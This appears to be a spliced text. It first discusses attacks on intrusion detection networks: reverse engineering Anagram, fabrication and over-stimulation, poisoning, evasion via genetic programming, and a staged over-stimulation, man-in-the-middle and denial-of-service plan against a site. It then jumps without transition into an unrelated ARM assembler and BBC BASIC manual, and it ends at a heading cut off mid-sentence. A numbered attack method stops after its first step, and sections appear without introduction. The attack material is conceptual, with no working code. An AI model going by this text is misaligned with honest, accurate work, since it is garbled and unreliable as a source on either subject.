One possible method to attack a randomized Anagram is to deploy the adversarial-model approach. In such a reverse engineering attack, the attacker must possess the ability to interact with the system being attacked, often in ways that differ significantly from what may be regarded as normal (e.g., by providing malformed inputs or an unusually large number of them). In some cases, the ability to do so is the bare minimum required to learn something useful about the system's inner workings.
The adversarial model analyzes the security of Anagram against reverse engineering attacks. In particular, the attack centers on querying Anagram with specific inputs and analyzing the corresponding responses. The method is as follows:
1. Prepare a payload.
Even though the use of randomization certainly makes reverse engineering a target network harder, it has flaws which show that an attacker who learns the masking algorithm could actually take advantage of the randomized detection process to evade Anagram, thus downgrading the network's security. Countermeasures are more than likely to be put in place within a short space of time as security loopholes are discovered, so the attack procedure needs to be re-evaluated constantly. For instance, each analyzed packet could be tested against a different random mask, possibly with different parameters too. While this would certainly stop these attacks from being effective in the short term, they could be bypassed in the future with a similar procedure.
Techniques for Reverse Engineering
Intrusion Detection Networks
To expand and make this clear: these adversarial models of attack are generally categorized as internal and external attacks.
External adversaries have control of the channels and communications between nodes but are not part of the IDN. Thus, if security protocols are used to provide confidentiality and integrity, they may not be able to inject or intercept packets. Internal attackers, on the other hand, are adversaries who have gained access to, and control of, at least one node within the IDN. They may possess cryptographic keys.
Defending a network from external adversaries can be done using traditional security mechanisms, such as cryptographic protocols and a Public Key Infrastructure (PKI). However, these techniques cannot be afforded in all scenarios, and a node usually cannot determine whether received information is real, has been forged by the source (i.e., an internal attacker), or has been manipulated in transit through the network (by an external attacker). Knowing how much trust can be placed in the received information is one of the key challenges in the design of IDNs. In simple terms, nodes in an IDN send and receive data using communication channels. The communication consists of the exchange of packets of information using network protocols and the specific format of the Intrusion Detection Messages (IDMs). There is much scope for attacking this type of system through reverse engineering.
Some rudimentary intrusive attacks can be deployed such as interception,
fabrication, modification and blocking.
Interception
This is a passive type of intrusion which seeks to compromise the confidentiality of information on a network. The adversary eavesdrops on the contents of the messages transmitted through the network channels; for example, a malicious node may monitor its neighbors and intercept their data.
Fabrication
Fabrication attacks compromise the authenticity of data on a network or
individual target. The attacker generates fake data and sends it to the intended
target. For example, using spoofed addresses, the attacker may fabricate
packets that match the signatures of an IDS in order to overstimulate it.
Modification
This attack targets the integrity of the data. The adversary intercepts data,
modifies its contents and forwards it to the actual destination. For example,
the attacker may modify the content of an attack to evade the signatures
matching process from IDSs.
Blocking
This attack targets the integrity and availability of the data. The adversary interrupts the communication or makes it unavailable. Packet-dropping attacks are an example of this type of weapon in an attacker's arsenal, where a malicious node drops packets that are supposed to be forwarded, so they don't reach their destination.
Over stimulation
This is where a set of packets is sent to the node to make it trigger a huge number of responses. Because the objective is to over-stimulate the system until it becomes impractical to operate, this attack can be applied to every function of the nodes. Over-stimulation is usually carried out in tandem with fabrication, i.e., the attacker generates specific packets that provoke the node's reaction. For example, by fabricating packets that match the signatures of the targeted node, the adversary can overwhelm security staff or overload the IDS resources.
Poisoning
The attacker looks for nodes that update their detection function in real time with new data. The goal is to inject noise, forcing the detection function to learn wrong patterns. Since the objective is to inject specific information into the node, poisoning requires either modification (of data sent by other nodes in the IDN) or fabrication of new data.
Denial of Service
This involves overloading the resources of the nodes in networks to attack their availability and bring about downtime. To force these node functions to stop working, they may either be flooded to overload their resource capability, using fabrication, or be blocked to prevent the nodes from receiving the data they need to function correctly.
Response Hijacking
In this scenario, the attacker sends selected intrusive data to the node, forcing
it to generate a specific response. To provoke a specific response in the node,
the attacker may deploy some of the following techniques:
Blocking.
As explained above for evasion, the IDN node may be waiting for specific IDMs or packets to confirm that a peer is not malicious. If the attacker blocks this critical data sent by a third peer, the node may erroneously believe that this third peer is malicious.
Modification
The attacker may modify reports or IDMs to indicate that a third node is
malicious.
Fabrication
As with modification, the attacker can generate false reports about a third node
to force the detector to trigger an erroneous response.
Reverse Engineering
The adversary gains information about the behavior of the node (architecture, detection function, set of measurements, etc.). This is applicable to every function in the nodes, and can be done using the same techniques employed for an over-stimulation attack; in addition, however, the attacker must intercept the traffic to monitor both the inputs and outputs of the node and make the analysis. A paradigmatic reverse engineering attack in IDNs occurs when the attacker deploys a traffic analysis of the network in order to locate the IDN nodes and their roles in the structure of the network(s).
Evasion
An evasion attack succeeds when an IDN node is not able to detect a misbehaving node. The attacker achieves this by blocking, modifying, or fabricating data in the network channels of the nodes.
Analyzing Larger Networks
Analyzing or attacking larger networks (such as WANs, data centers, etc.) requires intrusion techniques combined with elements of social engineering and reverse engineering.
The combined actions of the above result in a denial of service and thwart alert sharing across multiple networked sites.
At this point reverse engineering can be deployed to ascertain which systems implement IDN nodes. The goal is to discover which nodes share alerts at the top of the hierarchy. This means intercepting the OIDM channel to discover who is responding to the previous over-stimulation attack. Then a man-in-the-middle attack can be deployed at the Internet access point (router) of the site under attack to perform a traffic analysis of the systems sending information to the Internet.
The final phase is to conduct the denial of service attack proper. The goal of the attack is to isolate the site from the rest of the IDN and block alerts to the Internet.
Essentially, analyzing and/or attacking larger networks involves a three-phase approach: over-stimulation, reverse engineering and denial of service.
Reverse Engineering Attacks On E-
commerce Websites Using Genetic
Programming
The key to reverse engineering an e-commerce site is to understand the behavior of its IDS system(s).
Genetic Programming (GP) can be utilized to obtain an approximation of the
decision surface of the actual detection model at the core of the IDS.
Given a search problem over a large solution space, GP performs a heuristic search to obtain a locally optimal solution. GP is a technique that keeps a set of programs (also called the population of individuals), randomly initialized, which are evolved according to procedures inspired by the laws of natural selection. In this scheme, each program (individual) has a tree-like structure where the root and intermediate nodes are mathematical and logic functions, and the leaves are terminal features. Each generation is obtained by selecting the best individuals from the previous one. Some individuals are mutated (changing an internal subtree for another) or subject to crossover (exchanging subtrees between two different individuals), according to a set of parameters. After a given number of generations, or when an optimal solution is achieved, the algorithm stops and the best individual of the last generation is given as the solution. These values are obtained using 10-fold cross-validation and the combination of parameters that performs best in terms of accuracy.
Evasion Attack
The reverse engineering attack explained above provides the adversary with a model of the way the IDS works, which facilitates the construction of evasion attacks. Recall that the main idea of an evasion is to transform an instance that would be classified as a true positive by the IDS into one that would result in a false negative, i.e., performing attacks without generating alarms.
Two constraints apply. First, the payload obtained after the modification must still be a valid HTTP payload; for example, the word GET cannot be removed from an HTTP request. Second, the attack must still work after the modification; for example, removing the word INSERT from an SQL injection turns the payload into something useless to the adversary.
The risk-rating module outputs the total risk of the IDN, and for each node, the
risks for each attack and its aggregated risk (sum of all the attack risks). The
total risk of the IDN is the sum of the risks of all the individual nodes. This
information together with the information about which nodes have been
targeted (given by the threat module), is given to the allocation module.
The next component optimizes a cost-risk trade-off. For each solution, the more risk is mitigated, the higher the cost. Ideally, optimal solutions should minimize both the risk and the cost. However, these are mutually conflicting objectives and there isn't a single optimal solution, so a trade-off between risk and cost must be considered. Accordingly, Multi-Objective Optimization (MOO) is used to obtain the set of optimal solutions that make up the Pareto set. In MOO with two objectives, a solution from the Pareto set is called non-dominated if there is no other solution that improves one of the objectives without degrading the other. The set of non-dominated solutions is called the Pareto front.
There are several algorithms for obtaining the Pareto front. In these experiments, an evolutionary MOO algorithm known as SPEA2 is used. SPEA2 is one of the most popular MOO evolutionary algorithms and has been successfully applied in the intrusion detection sphere. Indeed, it is one of the two MOO algorithms implemented in the ECJ framework. The other algorithm implemented in ECJ is NSGA2 (Non-dominated Sorting Genetic Algorithm); while both are valid algorithms, SPEA2 optimizes the central points of the Pareto front better than NSGA2, which is better suited to finding solutions at the boundaries of the front. In this particular domain, solutions that are very costly or that reduce very little risk are generally not recommended. Accordingly, the main purpose is to optimize the points where the trade-off between cost and risk is unclear, which are the central points of the Pareto front.
When the risk must be reduced completely, or when there are unlimited resources, all the nodes are protected completely (i.e., all the risk is mitigated). However, when the cost is limited or the IDN tolerates some risk, the Pareto front indicates which solutions are optimal. These solutions indicate which countermeasures should be applied in order to solve one of the two following problems:
1. Given a tolerable risk, select the cheapest set of countermeasures that mitigates the risk below that tolerable level.
2. Given a limited budget, select the set of countermeasures that mitigates the most risk for that cost.
If the budget is limited, the allocation solution must reduce the risk the most. If there is a tolerable risk, the allocation solution must be the cheapest that decreases the risk below the tolerated level. In some situations, though, neither the cost nor the risk is limited. In these cases, it is helpful to know whether it is worth spending more resources to reduce the risk. When defending an IDN, one may think that the more resources are spent, the more risk is mitigated; however, this is not always the case.
In order to save resources, it is useful to know when it is convenient to allocate new countermeasures, and where they should be placed. The decision depends on several parameters, such as the architecture of the network, the influences between nodes, the cost of setting countermeasures in the nodes, etc. However, when dealing with bigger networks and having non-trivial alternatives (i.e., which are not random), the value of DEFIDNET is even greater.
Memory Pointers
You need to tell the assembler the start address of the area of memory you have
reserved. The simplest way to do this is to assign P% to point to the start of
this area. For example:
DIM code% required_size
...
P% = code%
P% is then used as the program counter. The assembler places the first
assembler instruction at the address P% and automatically increments the value
of P% by four so that it points to the next free location. When the assembler has
finished assembling the code, P% points to the byte following the final location
used. Therefore, the number of bytes of machine code generated is given by:
P% - code%
This method assumes that you wish subsequently to execute the code at the
same location.
The position in memory at which you load a machine code program may be
significant. For example, it might refer directly to data embedded within itself,
or expect to find routines at fixed addresses. Such a program only works if it is
loaded in the correct place in memory. However, it is often inconvenient to
assemble the program directly into the place where it will eventually be
executed. This memory may well be used for something else whilst you are
assembling the program. The solution to this problem is to use a technique
called 'offset assembly' where code is assembled as if it is to run at a certain
address but is actually placed at another.
To do this, set O% to point to the place where the first machine code
instruction is to be placed and P% to point to the address where the code is to
be run.
To notify the assembler that this method of generating code is to be used, the
directive OPT, which is described in more detail below, must have bit 2 set.
It is usually easy, and always preferable, to write ARM code that is position
independent.
Implementing Passes
Normally, when the processor is executing a machine code program, it
executes one instruction and then moves on automatically to the one following
it in memory. You can, however, make the processor move to a different
location and start processing from there instead by using one of the 'branch'
instructions. For example:
.result_was_0 ... BEQ result_was_0
The full stop in front of the name result_was_0 identifies this string as the name of a 'label'. This is a directive to the assembler which tells it to assign the current value of the program counter (P%) to the variable whose name follows the full stop.
BEQ means 'branch if the result of the last calculation that updated the PSR
was zero'. The location to be branched to is given by the value previously
assigned to the label result_was_0.
The label can, however, occur after the branch instruction. This causes a slight
problem for the assembler since when it reaches the branch instruction, it
hasn't yet assigned a value to the variable, so it doesn't know which value to
replace it with.
You can get around this problem by assembling the source code twice. This is
known as two-pass assembly. During the first pass the assembler assigns
values to all the label variables. In the second pass it is able to replace
references to these variables by their values.
Only when the text contains no forward references of labels is a single pass
sufficient.
These two passes may be performed by a FOR...NEXT loop as follows:
DIM code% required_size
FOR pass% = 0 TO 3 STEP 3
  P% = code%
  [
  OPT pass%
  ... further assembly language statements and assembler directives
  ]
NEXT pass%
Note that the pointer(s), in this case just P%, must be set at the start of both
passes.
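Putting this together, here is a sketch of a complete two-pass assembly of a routine containing a forward reference (the routine itself is illustrative: it returns 1 in R0 if the value passed in was non-zero, and 0 otherwise):

DIM code% 256
FOR pass% = 0 TO 3 STEP 3
  P% = code%
  [
  OPT pass%
  CMP R0, #0
  BEQ was_zero     ; forward reference, resolved on the second pass
  MOV R0, #1
  MOVS R15, R14
  .was_zero
  MOV R0, #0
  MOVS R15, R14
  ]
NEXT pass%

On the first pass (OPT 0) errors are suppressed while the label was_zero is assigned; on the second (OPT 3) the BEQ is encoded with the now-known address. Under BBC BASIC V the integer variable A% is passed to R0, so A% = 5 : PRINT USR(code%) would be expected to print 1.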
The OPT Directive
OPT is an assembler directive whose bits have the following meanings:

Bit  Meaning
0    Assembly listing enabled if set
1    Assembler errors enabled
2    Assembled code placed in memory at O% instead of P%
3    Check that assembled code does not exceed memory limit L%
Bit 0 controls whether a listing is produced; whether you want one is entirely
up to you.
Bit 1 determines whether or not assembler errors are to be flagged or
suppressed. For the first pass, bit 1 should be zero since otherwise any
forward-referenced labels will cause the error 'Unknown or missing variable'
and hence stop the assembly. During the second pass, this bit should be set to
one, since by this stage all the labels defined are known, so the only errors it
catches are 'real ones' - such as labels which have been used but not defined.
Bit 2 allows 'offset assembly', ie the program may be assembled into one area
of memory, pointed to by O%, whilst being set up to run at the address pointed
to by P%.
Bit 3 checks that the assembled code does not exceed the area of memory that
has been reserved (ie none of it is held in an address greater than the value
held in L%). When reserving space, L% might be set as follows:
DIM code% required_size
L% = code% + required_size
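A brief sketch combining the limit check with the two-pass loop described above (the loop values 8 and 11 are simply the usual 0 and 3 with bit 3 added):

DIM code% 256
L% = code% + 256
FOR pass% = 8 TO 11 STEP 3
  P% = code%
  [
  OPT pass%       ; bit 3 set: assembly stops if the code runs past L%
  ... assembly language statements
  ]
NEXT pass%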
Processor Modes
User mode is the normal program execution state. SVC mode is a special mode
which is entered when calls to the supervisor are made using software
interrupts (SWIs) or when an exception occurs. From within SVC mode certain
operations can be performed which are not permitted in user mode, such as
writing to hardware devices and peripherals. SVC mode has its own private
registers R13 and R14. So after changing to SVC mode, the registers R0 - R12
are the same, but new versions of R13 and R14 are available. The values
contained by these registers in user mode are not overwritten or corrupted.
Similarly, IRQ and FIQ modes have their own private registers (R13 - R14
and R8 - R14 respectively).
Although only 16 registers are available at any one time, the processor actually
contains a total of 27 registers.
For a more complete description of the registers, see the chapter entitled ARM
Hardware.
Condition Codes
All the machine code instructions can be performed conditionally according to
the status of one or more of the following flags: N, Z, C, V. The sixteen
available condition codes are:

AL  Always (the default)
CC  Carry clear               C clear
CS  Carry set                 C set
EQ  Equal                     Z set
GE  Greater than or equal     (N set and V set) or (N clear and V clear)
GT  Greater than              ((N set and V set) or (N clear and V clear)) and Z clear
HI  Higher (unsigned)         C set and Z clear
LE  Less than or equal        (N set and V clear) or (N clear and V set) or Z set
LS  Lower or same (unsigned)  C clear or Z set
LT  Less than                 (N set and V clear) or (N clear and V set)
MI  Negative                  N set
NE  Not equal                 Z clear
NV  Never
PL  Positive                  N clear
VC  Overflow clear            V clear
VS  Overflow set              V set

Two of these may be given alternative names: CS may also be written HS
(higher or same, unsigned), and CC may be written LO (lower, unsigned).
You should not use the NV (never) condition code - see the chapter entitled
Warnings On The Use Of ARM Assembler.
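Any of these codes may be appended to an instruction mnemonic to make it conditional. For example, a short illustrative fragment using a conditional pair:

CMP R0, #10       ; set the flags on R0 - 10
MOVGT R0, #10     ; executed only if R0 > 10 (signed)
ADDLE R0, R0, #1  ; executed only if R0 <= 10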
The Instruction Set
The available instructions are introduced below in categories indicating the
type of action they perform and their syntax. The description of the syntax
obeys the following standards:
«»      indicates that the contents of the brackets are optional (unlike all
        other chapters, where we have been using [ ] instead)
(x|y)   indicates that either x or y but not both may be given
#exp    indicates that a BASIC expression is to be used which evaluates to
        an immediate constant.
Move Instructions
Syntax
opcode«cond»«S» Rd, (#exp|Rm)«,shift»
There are two move instructions; 'Op2' means '(#exp|Rm)«,shift»':

Instruction     Calculation Performed
MOV  Move       Rd = Op2
MVN  Move NOT   Rd = NOT Op2
Special actions are taken if any of the source registers are R15; the action is as
follows:
If Rm=R15 all 32 bits of R15 are used in the operation ie the PC +
PSR.
If Rn=R15 only the 24 bits of the PC are used in the operation.
If the destination register is R15, then the action depends on whether the
optional 'S' has been used:
If S is not present only the 24 bits of the PC are set.
If S is present the whole result is written to R15, the flags are
updated from the result. (However the mode, I and F bits can only
be changed when in non-user modes.)
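By way of illustration, some example uses of the two move instructions (the register values are arbitrary):

MOV R0, #&FF          ; R0 = 255
MVN R1, #0            ; R1 = NOT 0 = &FFFFFFFF
MOV R2, R0, LSL #2    ; Op2 with a shift: R2 = R0 * 4
MOV R3, R15           ; R15 in the Rm position: R3 = PC + PSR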
Comparison Instructions
Syntax
opcode«cond»«S|P» Rn, (#exp|Rm)«,shift»
There are four comparison instructions; again, 'Op2' means '(#exp|Rm)«,shift»':

Instruction           Calculation Performed
CMN  Compare negated  Rn + Op2
CMP  Compare          Rn - Op2
TEQ  Test equal       Rn EOR Op2
TST  Test             Rn AND Op2
These are similar to the arithmetic and logical instructions listed above except
that they do not take a destination register since they do not return a result.
Also, they automatically set the condition flags (since they would perform no
useful purpose if they didn't). Hence, the 'S' of the arithmetic instructions is
implied. You can put an 'S' after the instruction to make this clearer.
These routines have an additional function which is to set the whole of the PSR
to a given value. This is done by using a 'P' after the op code, for example
TEQP.
Normally the flags are set depending on the value of the comparison. The I and
F bits and the mode and register bits are unaltered. The 'P' option allows the
corresponding eight bits of the result of the calculation performed by the
comparison to overwrite those in the PSR (or just the flag bits in user mode).
Example
TEQP PC, #&80000000   ; Set N flag, clear all others. Also enable
                      ; IRQs, FIQs, select User mode if privileged
The above example (as well as setting the N flag and clearing the others) will
alter the IRQ, FIQ and mode bits of the PSR - but only if you are in a
privileged mode.
The 'P' option is also useful in user mode, for example to collect errors:
STMFD sp!, {r0, r1, r14}
...
BL routine1
STRVS r0, [sp, #0]        ; save error block ptr in return r0
                          ; in stack frame if error
MOV r1, pc                ; save psr flags in r1
BL routine2               ; called even if error from routine1
STRVS r0, [sp, #0]        ; to do some tidy up action etc.
TEQVCP r1, #0             ; if routine2 didn't give error,
LDMFD sp!, {r0, r1, pc}   ; restore error indication from r1
Multiply Instructions
Syntax
MUL«cond»«S» Rd,Rm,Rs
MLA«cond»«S» Rd,Rm,Rs,Rn
There are two multiply instructions:
Instruction               Calculation Performed
MUL  Multiply             Rd = Rm × Rs
MLA  Multiply-accumulate  Rd = Rm × Rs + Rn
The multiply instructions perform integer multiplication, giving the least
significant 32 bits of the product of two 32-bit operands.
The destination register must not be R15 or the same as Rm. Any other register
combinations can be used.
If the 'S' is given in the instruction, the N and Z flags are set on the result, and
the C and V flags are undefined.
Examples
MUL R1,R2,R3
MLAEQS R1,R2,R3,R4
Branching Instructions
Syntax
B«cond» expression
BL«cond» expression
There are essentially only two branch instructions but in each case the branch
can take place as a result of any of the 15 usable condition codes:
Instruction
B    Branch
BL   Branch and link
The branch instruction causes the execution of the code to jump to the
instruction given at the address to be branched to. This address is held relative
to the current location.
Example
BEQ label1   ; branch if zero flag set
BMI minus    ; branch if negative flag set
The branch and link instruction performs the additional action of copying the
address of the instruction following the branch, and the current flags, into
register R14. R14 is known as the 'link register'. This means that the routine
branched to can be returned from by transferring the contents of R14 into the
program counter and can restore the flags from this register on return. Hence
instead of being a simple branch the instruction acts like a subroutine call.
Example
        BLEQ equal
        .........        ; address of this instruction
        .........        ; moved to R14 automatically
.equal  .........        ; start of subroutine
        .........
        MOVS R15,R14     ; end of subroutine
Single Register Load/Save Instructions
These instructions allow a single register to load a value from memory or save
a value to memory at a given address.
The instruction has two possible forms:
the address is specified by register(s), whose names are enclosed in
square brackets
the address is specified by an expression
Address Given By Registers
The simplest form of address is a register number, in which case the contents
of the register are used as the address to load from or save to. There are two
other alternatives:
pre-indexed addressing (with optional write back)
post-indexed addressing (always with write back)
With pre-indexed addressing the contents of another register, or an immediate
value, are added to the contents of the first register. This sum is then used as
the address. It is known as pre-indexed addressing because the address being
used is calculated before the load/save takes place. The first register (Rn
below) can be optionally updated to contain the address which was actually
used by adding a '!' after the closing square bracket.
Address Syntax         Address
[Rn]                   Contents of Rn
[Rn,±#m]«!»            Contents of Rn ± m
[Rn,±Rm]«!»            Contents of Rn ± contents of Rm
[Rn,±Rm,shift #s]«!»   Contents of Rn ± (contents of Rm shifted by s places)
With post-indexed addressing the address being used is given solely by the
contents of the register Rn. The rest of the instruction determines what value is
written back into Rn. This write back is performed automatically; no '!' is
needed. Post-indexing gets its name from the fact that the address that is written
back to Rn is calculated after the load/save takes place.
Address Syntax      Value Written Back
[Rn],±#m            Contents of Rn ± m
[Rn],±Rm            Contents of Rn ± contents of Rm
[Rn],±Rm,shift #s   Contents of Rn ± (contents of Rm shifted by s places)
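To illustrate the difference between the two addressing forms, a short sketch (registers and offsets are arbitrary):

LDR R0, [R1, #4]    ; pre-indexed: load R0 from R1+4; R1 unchanged
LDR R0, [R1, #4]!   ; pre-indexed with write back: load from R1+4, then R1 = R1+4
LDR R0, [R1], #4    ; post-indexed: load R0 from R1, then R1 = R1+4
STR R0, [R1, R2]    ; pre-indexed: store R0 at address R1 + R2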
Multiple Register Load/Save Instructions
Syntax
LDM«cond»type Rn«!», Rlist«^»
STM«cond»type Rn«!», Rlist«^»
The contents of register Rn give the base address from/to which the value(s)
are loaded or saved. This base address is effectively updated during the
transfer, but is only written back to if you follow it with a '!'.
Rlist provides a list of registers which are to be loaded or saved. The order
the registers are given, in the list, is irrelevant since the lowest numbered
register is loaded/saved first, and the highest numbered one last. For example,
a list comprising {R5,R3,R1,R8} is loaded/saved in the order R1, R3, R5, R8,
with R1 occupying the lowest address in memory. You can specify consecutive
registers as a range; so {R0-R3} and {R0,R1,R2,R3} are equivalent.
The type is a two-character mnemonic specifying either how Rn is updated, or
what sort of a stack results:
Mnemonic  Meaning
DA        Decrement Rn After each store/load
DB        Decrement Rn Before each store/load
IA        Increment Rn After each store/load
IB        Increment Rn Before each store/load
EA        Empty Ascending stack is used
ED        Empty Descending stack is used
FA        Full Ascending stack is used
FD        Full Descending stack is used

where:
an empty stack is one in which the stack pointer points to the first
free slot in it
a full stack is one in which the stack pointer points to the last data
item written to it
an ascending stack is one which grows from low memory addresses
to high ones
a descending stack is one which grows from high memory addresses
to low ones
In fact these are just different ways of looking at the situation - the way Rn is
updated governs what sort of stack results, and vice versa. So, for each type of
instruction in the first group there is an equivalent in the second:
LDMEA is the same as LDMDB
LDMED is the same as LDMIB
LDMFA is the same as LDMDA
LDMFD is the same as LDMIA
All Acorn software uses an FD (full, descending) stack. If you are writing
code for SVC mode you should try to use a full descending stack as well -
although you can use any type you like.
A '^' at the end of the register list has two possible meanings:
For a load with R15 in the list, the '^' forces update of the PSR.
Otherwise the '^' forces the load/store to access the User mode
registers. The base is still taken from the current bank though, and if
you try to write back the base it will be put in the User bank -
probably not what you would have intended.
Examples
LDMIA R5, {R0,R1,R2}   ; where R5 contains the value &1484
                       ; This will load R0 from &1484
                       ;                R1 from &1488
                       ;                R2 from &148C

LDMDB R5, {R0-R2}      ; where R5 contains the value &1484
                       ; This will load R0 from &1478
                       ;                R1 from &147C
                       ;                R2 from &1480
If there were a '!' after R5, so that it were written back to, then this would
leave R5 containing &1490 and &1478 after the first and second examples
respectively.
The examples below show directly equivalent ways of implementing a full
descending stack. The first uses mnemonics describing how the stack pointer is
handled:
STMDB Stackpointer!, {R0-R3}   ; push onto stack
...
LDMIA Stackpointer!, {R0-R3}   ; pull from stack
and the second uses mnemonics describing how the stack behaves:
STMFD Stackpointer!, {R0,R1,R2,R3}   ; push onto stack
...
LDMFD Stackpointer!, {R0,R1,R2,R3}   ; pull from stack
Using The Base Register
You can always load the base register without any side effects on
the rest of the LDM operation, because the ARM uses an internal
copy of the base, and so will not be aware that it has been loaded
with a new value.
However, you should see Appendix B: Warnings on the use of
ARM assembler for notes on using writeback when doing so.
You can store the base register as well. If you are not using write
back then no problem will occur. If you are, then this is the order in
which the ARM does the STM:
write the lowest numbered register to memory
do the write back
write the other registers to memory in ascending order.
So, if the base register is the lowest-numbered one in the list, its
original value is stored:
STMIA R2!, {R2-R6} ; R2 stored is value before write back
Otherwise its written back value is stored:
STMIA R2!, {R1-R5} ; R2 stored is value after write back
Using The Program Counter
If you use the program counter (PC, or R15) in the list of registers:
the PSR is saved with the PC; and (because of pipelining) it will be
advanced by twelve bytes from the current position
the PSR is only loaded if you follow the register list with a '^'; and
even then, only the bits you can modify in the ARM's current mode
are loaded.
It is generally not sensible to use the PC as the base register. If you do:
the PSR bits are used as part of the address, which will give an
address exception unless all the flags are clear and all interrupts are
enabled.
SWI Instruction
Syntax
SWI«cond» expression
SWI«cond» "SWIname" (BBC BASIC assembler)
The SWI mnemonic stands for Software Interrupt. On encountering a SWI, the
ARM processor changes into SVC mode and stores the address of the next
location in R14_svc - so the User mode value of R14 is not corrupted. The
ARM then goes to the SWI routine handler via the hardware SWI vector
containing its address.
The first thing that this routine does is to discover which SWI was requested. It
finds this out by using the location addressed by (R14_svc - 4) to read the
current SWI instruction. The op code for a SWI is 32 bits long: 4 bits identify
the op code as being for a SWI, 4 bits hold the condition codes and the
bottom 24 bits identify which SWI it is. Hence 2^24 different SWI routines can
be distinguished.
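As an illustration, a hypothetical handler fragment might extract the SWI number like this (a sketch only, not the actual RISC OS handler code):

BIC R0, R14, #&FC000003   ; mask the PSR bits out of the return address
LDR R0, [R0, #-4]         ; fetch the SWI instruction just executed
BIC R0, R0, #&FF000000    ; clear the top 8 bits (op code and condition),
                          ; leaving the 24-bit SWI number in R0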
When it has found which particular SWI it is, the routine executes the
appropriate code to deal with it and then returns by placing the contents of
R14_svc back into the PC, which restores the mode the caller was in.
This means that R14_svc will be corrupted if you execute a SWI in SVC mode
- which can have disastrous consequences unless you take precautions.
The most common way to call this instruction is by using the SWI name, and
letting the assembler translate this to a SWI number. The BBC BASIC
assembler can do this translation directly:
SWINE "OS_WriteC"
See the chapter entitled An introduction to SWIs for a full description of how
RISC OS handles SWIs, and the index of SWIs for a full list of the operating
system SWIs.
Warnings On The Use Of ARM Assembler
Introduction
The ARM processor family uses Reduced Instruction Set (RISC) techniques to
maximize performance; as such, the instruction set allows some instructions
and code sequences to be constructed that will give rise to unexpected (and
potentially erroneous) results. These cases must be avoided by all machine
code writers and generators if correct program operation across the whole
range of ARM processors is to be obtained.
In order to be upwards compatible with future versions of the ARM processor
family never use any of the undefined instruction formats:
those shown in the Acorn RISC Machine family Data Manual as
'Undefined' which the processor traps;
those which are not shown in the manual and which don't trap (for
example, a Multiply instruction where bit 5 or 6 of the instruction is
set).
In addition the 'NV' (never executed) instruction class should not be used (it is
recommended that the instruction 'MOV R0,R0' be used as a general
purpose no-op).
This chapter lists the instructions and code sequences to be avoided. It
is strongly recommended that you take the time to familiarize yourself with
these cases because some will only fail under particular circumstances which
may not arise during testing.
For more details on the ARM chip see the Acorn RISC Machine family Data
Manual. VLSI Technology Inc. (1990) Prentice-Hall, Englewood Cliffs, NJ,
USA: ISBN 0-13-781618-9.
Restrictions To The ARM Instruction Set
There are several reasons for restricting the use of certain parts of the
instruction set, among them:
Dangerous Instructions
Such instructions can cause a program to fail unexpectedly, for
example:
LDM R15,Rlist
Useless Instructions
It is better to reserve the instruction space occupied by existing
'useless' instructions for instruction expansion in future processors.
For example:
MUL R15,Rm,Rs
Mode Changes
When an instruction changes the processor mode, the register bank in use also
changes. The safest default is always to add a NOP (e.g. MOV R0,R0) after a
mode changing instruction; this will guarantee correct operation regardless of
the code sequence following it.
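For instance, a sketch of a mode change followed by the recommended NOP (the PSR value is illustrative):

TEQP R15, #0    ; clear the PSR: select User mode, enable IRQs and FIQs
MOV R0, R0      ; the recommended NOP before any following instruction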
Use Of R15
Data processing instructions have the syntax:
opcode«cond»«S» Rd,Rn,Rm«,shift #s»
or
opcode«cond»«S» Rd,Rn,Rm,shiftname Rs
When R15 is used in the Rm position, it will give the value of the
PC together with the PSR flags.
When R15 is used in the Rn or Rs positions, it will give the value of
the PC without the PSR flags (PSR bits replaced by zeros).
MOV R0,#0
ORR R1,R0,R15   ; R1:=PC+PSR (bits 31:26,1:0 reflect PSR flags)
ORR R2,R15,R0   ; R2:=PC (bits 31:26,1:0 set to zero)
Note: The relevant instruction description in the ARM Acorn RISC Machine
family Data Manual should be consulted for full details of the behavior of
R15.
STM: Inclusion Of The Base In The Register List
Applicability: ARM2, ARM3
Warning: In the case of a STM with writeback that includes the base register in
the register list, the value of the base register stored depends upon its position
in the register list.
During an STM, the first register is written out at the start of the second cycle
of the instruction. When writeback is specified, the base is written back at the
end of the second cycle. An STM which includes storing the base, with the
base as the first register to be stored, will therefore store the unchanged value,
whereas with the base second or later in the transfer order, it will store the
modified value.
For example:
MOV R5,#&1000
STMIA R5!,{R5-R6}   ; Stores value of R5=&1000

MOV R5,#&1000
STMIA R5!,{R4-R5}   ; Stores value of R5=&1008
MUL/MLA: Register Restrictions
Applicability: ARM2, ARM3
Given   MUL Rd,Rm,Rs
or      MLA Rd,Rm,Rs,Rn
Then    Rd and Rm must be different registers
        Rd must not be R15
Rd must not be R15
Due to the way the Booth's algorithm has been implemented, certain
combinations of operand registers should be avoided. (The assembler will
issue a warning if these restrictions are overlooked.)
The destination register (Rd) should not be the same as the Rm operand
register, as Rd is used to hold intermediate values and Rm is used repeatedly
during the multiply. A MUL will give a zero result if Rm=Rd, and a MLA will
give a meaningless result.
The destination register (Rd) should also not be R15. R15 is protected from
modification by these instructions, so the instruction will have no effect, except
that it will put meaningless values in the PSR flags if the S bit is set.
All other register combinations will give correct results, and Rd, Rn and Rs
may use the same register when required.
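The restriction is easy to trip over; a short illustration:

MUL R0, R0, R1       ; WRONG: Rd = Rm, so the result is zero
MUL R0, R1, R0       ; allowed: Rd may be the same as Rs
MLA R0, R1, R2, R0   ; allowed: Rd may be the same as Rn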
LDM/STM: Address Exceptions
Applicability: ARM2, ARM3
Warning: Illegal addresses formed during a LDM or STM operation will not
cause an address exception.
Only the address of the first transfer of a LDM or STM is checked for an
address exception; if subsequent addresses over-flow or under-flow into
illegal address space they will be truncated to 26 bits but will not cause an
address exception trap.
The following examples assume the processor is in a non-user mode and
MEMC is being accessed:
MOV R0,#&04000000   ; R0=&04000000
STMIA R0,{R1-R2}    ; Address exception reported (base address illegal)

MOV R0,#&04000000
SUB R0,R0,#4        ; R0=&03FFFFFC
STMIA R0,{R1-R2}    ; No address exception reported (base address legal)
                    ; code will overwrite data at address &00000000
Note: The exact behavior of the system depends upon the memory manager to
which the processor is attached; in some cases, the wraparound may be
detected and the instruction aborted.
LDC/STC: Address Exceptions
Applicability: ARM2, ARM3
Warning: Illegal addresses formed during a LDC or STC operation will not
cause an address exception (affects LDF/STF).
The coprocessor data transfer operations act like STM and LDM, with the
processor generating the addresses and the coprocessor supplying or reading
the data. As with LDM/STM, only the address of the first transfer of a LDC or
STC is checked for an address exception; if subsequent addresses over-flow
or under-flow into illegal address space they will be truncated to 26 bits but
will not cause an address exception trap.
The Future
A familiar pattern with IDNs and their circumvention is that it is a never
